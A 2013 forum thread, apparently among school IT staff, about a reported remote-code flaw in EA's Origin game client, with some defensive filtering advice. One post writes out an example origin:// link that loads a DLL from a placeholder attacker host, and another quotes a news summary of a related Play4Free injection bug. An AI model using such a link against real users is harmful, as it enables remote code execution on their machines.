+ Post New Thread
Results 1 to 13 of 13
General Chat Thread, Origin - Players at risk from game store hack attack in General; BBC News - Players at risk from game store hack attack I hate origin. I reluctantly caved and installed it ...
  1. #1
    Guest

    Join Date
    Jun 2009
    Posts
    3,754
    Thank Post
    1,458
    Thanked 491 Times in 375 Posts
    Rep Power
    0

    Origin - Players at risk from game store hack attack

    BBC News - Players at risk from game store hack attack

    I hate origin. I reluctantly caved and installed it to play Battlefield 3. Wish I never bothered now.

  2. #2

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,470
    Thank Post
    631
    Thanked 2,116 Times in 1,452 Posts
    Blog Entries
    19
    Rep Power
    882
    The funny things is... Steam had this exact problem a while back. [Which was fixed pretty quickly.]

    EA didn't even bother to check if it was possible with Origin, based on their remote launch method being a copy of Steam's, and pre-patch it.

  3. #3
    Sunnyknight's Avatar
    Join Date
    Mar 2013
    Location
    Above the clouds and under the core of the earth
    Posts
    1,490
    Thank Post
    123
    Thanked 127 Times in 90 Posts
    Rep Power
    72
    Quote Originally Posted by X-13 View Post
    EA
    That label is being hated more and more everyday. Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.

  4. #4

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,470
    Thank Post
    631
    Thanked 2,116 Times in 1,452 Posts
    Blog Entries
    19
    Rep Power
    882
    Quote Originally Posted by Sunnyknight View Post
    Won't be long before a group of people (no names, they're completely anonymous) may vent their frustration out on them.
    I heard they don't forgive. They also, allegedly, don't forget and you should expect them.

    There's also a rumour they're in it for "teh lulz".

  5. #5
    SovietRussia's Avatar
    Join Date
    Mar 2013
    Location
    Powys, Wales
    Posts
    686
    Thank Post
    75
    Thanked 157 Times in 122 Posts
    Rep Power
    49
    Great. At least I had Battlefield 3 for Free as I was a SimCity disaster case.

  6. #6
    Sunnyknight's Avatar
    Join Date
    Mar 2013
    Location
    Above the clouds and under the core of the earth
    Posts
    1,490
    Thank Post
    123
    Thanked 127 Times in 90 Posts
    Rep Power
    72
    Quote Originally Posted by X-13 View Post
    I heard they don't forgive. They also, allegedly, don't forget and you should expect them.

    There's also a rumour they're in it for "teh lulz".
    Who knows, all i know is, respect who they are or face the consequences!
    @SovietRussia

    I pulled out DS3 BF3 = too many bugs

  7. #7
    CAM
    CAM is offline

    CAM's Avatar
    Join Date
    Mar 2008
    Location
    Burgh Heath, Surrey
    Posts
    4,291
    Thank Post
    869
    Thanked 395 Times in 305 Posts
    Blog Entries
    60
    Rep Power
    288
    I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?

  8. #8

    Geoff's Avatar
    Join Date
    Jun 2005
    Location
    Fylde, Lancs, UK.
    Posts
    11,813
    Thank Post
    110
    Thanked 586 Times in 507 Posts
    Blog Entries
    1
    Rep Power
    225
    Yes, if something registers as a URL handler then the browser (depends) will prompt you what you want to happen the first time you click such a link. Most people don't read what they are being told and worse click the 'always do this for links like this' too. At which point the URL handler has basically the same level of access as a browser plugin.

    I don't imagine it'll be a big deal in most school environments but more generally I think you should pull up an 'average' machine and just check what url handlers you have installed (Java I'm looking at you). There's also scope for your web filter picking up 'odd' URL links. Some one like @tom_newton would know more I imagine.
    Last edited by Geoff; 19th March 2013 at 01:18 PM.

  9. #9

    X-13's Avatar
    Join Date
    Jan 2011
    Location
    /dev/null
    Posts
    9,470
    Thank Post
    631
    Thanked 2,116 Times in 1,452 Posts
    Blog Entries
    19
    Rep Power
    882
    Quote Originally Posted by CAM View Post
    I'm guessing it's related to crafting an Origin:// link pointing to something nasty and Origin executes it automatically without warning?
    Sort of.

    Code:
    origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll 
    ^ That would download a DLL from a remote location without your input. But, it could [I think] me modified to do pretty much anything. Especially, if you set it to download a lot of malicious files and a script to run them.

  10. #10


    Join Date
    Jan 2012
    Posts
    2,980
    Thank Post
    1,116
    Thanked 443 Times in 325 Posts
    Rep Power
    228
    There is no evidence the loophole has yet been used by malicious hackers.
    But for how long, now that it's out, 'eh?

    I think I have an origin account. Think. I had one of the BF games, can't remember which. Don't play it much anyway.
    Honestly I haven't bought anything EA in a while. Not because of any boycotts, just because I haven't xD

  11. #11
    Yeo695's Avatar
    Join Date
    Feb 2013
    Posts
    141
    Thank Post
    37
    Thanked 43 Times in 11 Posts
    Rep Power
    22
    Though i did get a free copy of Dead Space 3 for putting up with Sim City and a Free copy of BF3 from AMD card i bought a while back. EA is like drugs to me. They make a few good games that I love to play (BF3, Tomb Raider, Sim City) but buying them and supporting them is destroying my humanity. The gaming community really needs to protest this but I know it will never happen

  12. #12


    tom_newton's Avatar
    Join Date
    Sep 2006
    Location
    Leeds
    Posts
    4,485
    Thank Post
    867
    Thanked 854 Times in 675 Posts
    Rep Power
    197
    The only way to catch these in filtering is actually to look in-page (possible with your smoothie!) it's computationally cheap to "block any page containing origin://" - much more expensive to "find and replace" it out. Either is possible, but be kind to your CPU and use the "block" method

    O course by the time someone clicks the link, all bets are off, as the handler needn't obey proxy rules.

  13. #13


    Join Date
    Feb 2007
    Location
    51.403651, -0.515458
    Posts
    9,390
    Thank Post
    241
    Thanked 2,817 Times in 2,078 Posts
    Rep Power
    813
    Here's a new one...

    Bug in EA's Battlefield Play4Free allows attackers to hijack players' PCs « Ars Technica

    The ReVuln researchers identified the root cause of the vulnerability as the way Play4Free invokes an update mechanism. It allows attackers to use the CreateProcessW Windows API to inject a series of variables into commands that allows them to override the whitelist protection. The end result is the ability to upload a batch file to the Windows startup folder of vulnerable machines. The file is automatically executed the next time the computer is rebooted, and depending on its contents, it can install a host of malicious software.
    Obviously only any issue if you play Battlefield P4F on Windows XP. At this point, you deserve what you get if you are playing games on such an old operating system.

SHARE:
+ Post New Thread

Similar Threads

  1. Network at Risk Notification
    By AWicher in forum CLEO
    Replies: 0
    Last Post: 20th January 2011, 09:04 AM
  2. Network at Risk Notification
    By Paul_L in forum CLEO
    Replies: 0
    Last Post: 5th October 2010, 10:55 AM
  3. BSF at risk.... at least according to the LM
    By mossj in forum East Midlands Broadband Consortium (EMBC)
    Replies: 1
    Last Post: 2nd December 2009, 01:14 PM
  4. eBay: removed bid from BIN & store sales
    By contink in forum General Chat
    Replies: 0
    Last Post: 25th March 2009, 02:15 PM
  5. UK economy at risk, warns Cameron...
    By mattx in forum General Chat
    Replies: 27
    Last Post: 9th December 2008, 10:23 PM

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •